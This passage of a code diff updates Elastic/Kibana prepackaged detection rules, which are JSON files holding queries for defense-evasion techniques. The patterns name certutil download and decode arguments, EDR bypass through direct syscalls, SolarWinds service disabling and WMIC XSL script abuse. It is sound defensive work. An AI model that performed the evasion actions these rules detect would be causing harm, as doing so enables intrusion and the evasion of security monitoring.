\"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\" and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\", \n \"ConfigurationWizard*.exe\", \n \"NetflowDatabaseMaintenance*.exe\", \n \"NetFlowService*.exe\", \n \"SolarWinds.Administration*.exe\", \n \"SolarWinds.Collector.Service*.exe\" , \n \"SolarwindsDiagnostics*.exe\")\n", + "note": "", + "query": "registry where registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\" and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\",\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\" ,\n \"SolarwindsDiagnostics*.exe\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" ], + "required_fields": [ + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -75,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json index d939761852ca8..148879ee94cf6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json @@ -14,14 +14,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Alert Suppression Rule Created or Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and \nevent.outcome: \"success\"\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and\nevent.outcome: \"success\"\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://docs.microsoft.com/en-us/rest/api/securitycenter/alerts-suppression-rules/update" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f0bc081a-2346-4744-a6a4-81514817e888", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json index 557358c470c5e..44a4073ec75ba 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json @@ -13,16 +13,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and \n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", + "note": "", + "query": "process where event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://twitter.com/egre55/status/1087685529016193025", "https://www.sysadmins.lv/blog-en/certutil-tips-and-tricks-working-with-x509-file-format.aspx", "https://docs.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fd70c98a-c410-42dc-a2e3-761c71848acf", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +75,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 14 + "version": 16 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json index 9228fc3856550..dfc1d97be5576 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json @@ -12,14 +12,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Execution from a Mounted Device", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and process.executable : \"C:\\\\*\" and\n (process.working_directory : \"?:\\\\\" and not process.working_directory: \"C:\\\\\") and\n process.parent.name : \"explorer.exe\" and\n process.name : (\"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\", \"cmd.exe\", \"regsvr32.exe\",\n \"cscript.exe\", \"wscript.exe\")\n", "references": [ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -39,7 +67,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -86,5 +114,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json index 75b897a107446..975b1e7a70b5e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json @@ -16,6 +16,28 @@ "references": [ "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "acf738b5-b5b2-4acc-bad9-1e18ee234f40", "severity": "high", @@ -44,5 +66,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json index d33620cbbf63b..de6ec9b91b7d9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json @@ -16,14 +16,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "High Number of Okta User Password Reset or Unlock Attempts", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and\n event.action:(system.email.account_unlock.sent_message or system.email.password_reset.sent_message or\n system.sms.send_account_unlock_message or system.sms.send_password_reset_message or\n system.voice.send_account_unlock_call or system.voice.send_password_reset_call or\n user.account.unlock_token)\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e90ee3af-45fc-432e-a850-4a58cf14a457", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -87,5 +106,5 @@ "value": 5 }, "type": "threshold", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json index 6073f402771af..054f305bf55b9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json @@ -11,14 +11,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n \n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace : (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\", \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is\nmalicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system\ncalls to bypass security solutions that rely on hooks.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting\nSSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json index 82541efacbd06..92ff9970ce66f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json @@ -11,7 +11,59 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Creation CallTrace", - "query": "sequence by host.id with maxspan=1m\n [process where event.code == \"1\" and\n /* sysmon process creation */\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"mshta.exe\",\n \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\")] by process.parent.entity_id, process.entity_id\n [process where event.code == \"10\" and\n /* Sysmon process access event from unknown module */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"] by process.entity_id, winlog.event_data.TargetProcessGUID\n", + "query": "sequence by host.id with maxspan=1m\n [process where event.code == \"1\" and\n /* sysmon process creation */\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\", \"fltldr.exe\",\n \"mspub.exe\", \"msaccess.exe\",\"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") and\n\n /* noisy FP patterns */\n not (process.parent.name : \"EXCEL.EXE\" and process.executable : \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\ADDINS\\\\*.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\splwow64.exe\" and process.args in (\"8192\", \"12288\") and process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"rundll32.exe\" and process.parent.args : (\"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\", \"--no-sandbox\")) and\n not (process.executable :\n (\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\DWWIN.EXE\") and\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"regsvr32.exe\" and process.parent.args : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ] by process.parent.entity_id, process.entity_id\n [process where event.code == \"10\" and\n /* Sysmon process access event from unknown module */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"] by process.entity_id, winlog.event_data.TargetProcessGUID\n", + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetProcessGUID", + "type": "unknown" + } + ], "risk_score": 43, "rule_id": "3ed032b2-45d8-4406-bc79-7ad1eabb2c72", "severity": "medium", @@ -40,5 +92,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json index 7af9829cb43f5..be6001b156a9a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json @@ -10,7 +10,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Script Object Execution", - "query": "sequence by process.entity_id with maxspan=2m\n [process where event.type == \"start\" \n and (process.code_signature.subject_name in (\"Microsoft Corporation\", \"Microsoft Windows\") and \n process.code_signature.trusted == true) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\cscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cscript.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"?:\\\\Windows\\\\system32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\system32\\\\taskhostw.exe\",\n \"?:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\system32\\\\wscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wscript.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cmd.exe\")]\n [library where event.type == \"start\" and dll.name : \"scrobj.dll\"]\n", + "query": "sequence by process.entity_id with maxspan=2m\n [process where event.type == \"start\"\n and (process.code_signature.subject_name in (\"Microsoft Corporation\", \"Microsoft Windows\") and\n process.code_signature.trusted == true) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\cscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cscript.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"?:\\\\Windows\\\\system32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\system32\\\\taskhostw.exe\",\n \"?:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\system32\\\\wscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wscript.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cmd.exe\")]\n [library where event.type == \"start\" and dll.name : \"scrobj.dll\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff", "severity": "medium", @@ -32,12 +64,12 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_short_program_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_short_program_name.json new file mode 100644 index 0000000000000..839b4ab494f86 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_short_program_name.json @@ -0,0 +1,77 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies process execution with a single character process name. This is often done by adversaries while staging or executing temporary utilities.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution - Short Program Name", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and length(process.name) > 0 and\n length(process.name) == 5 and host.os.name == \"Windows\" and length(process.pe.original_file_name) > 5\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Windows", + "Threat Detection", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json index 8d02b5b8e52e8..549fc01a1cbe6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json @@ -12,7 +12,59 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious WMIC XSL Script Execution", - "query": "sequence by process.entity_id with maxspan = 2m\n[process where event.type in (\"start\", \"process_started\") and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name : \"wmic.exe\") and\n process.args : (\"format*:*\", \"/format*:*\", \"*-format*:*\") and\n not process.command_line : \"* /format:table *\"]\n[library where event.type == \"start\" and dll.name : (\"jscript.dll\", \"vbscript.dll\")]\n", + "query": "sequence by process.entity_id with maxspan = 2m\n[process where event.type in (\"start\", \"process_started\") and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name : \"wmic.exe\") and\n process.args : (\"format*:*\", \"/format*:*\", \"*-format*:*\") and\n not process.command_line : \"* /format:table *\"]\n[any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"jscript.dll\", \"vbscript.dll\") or file.name : (\"jscript.dll\", \"vbscript.dll\"))]\n", + "required_fields": [ + 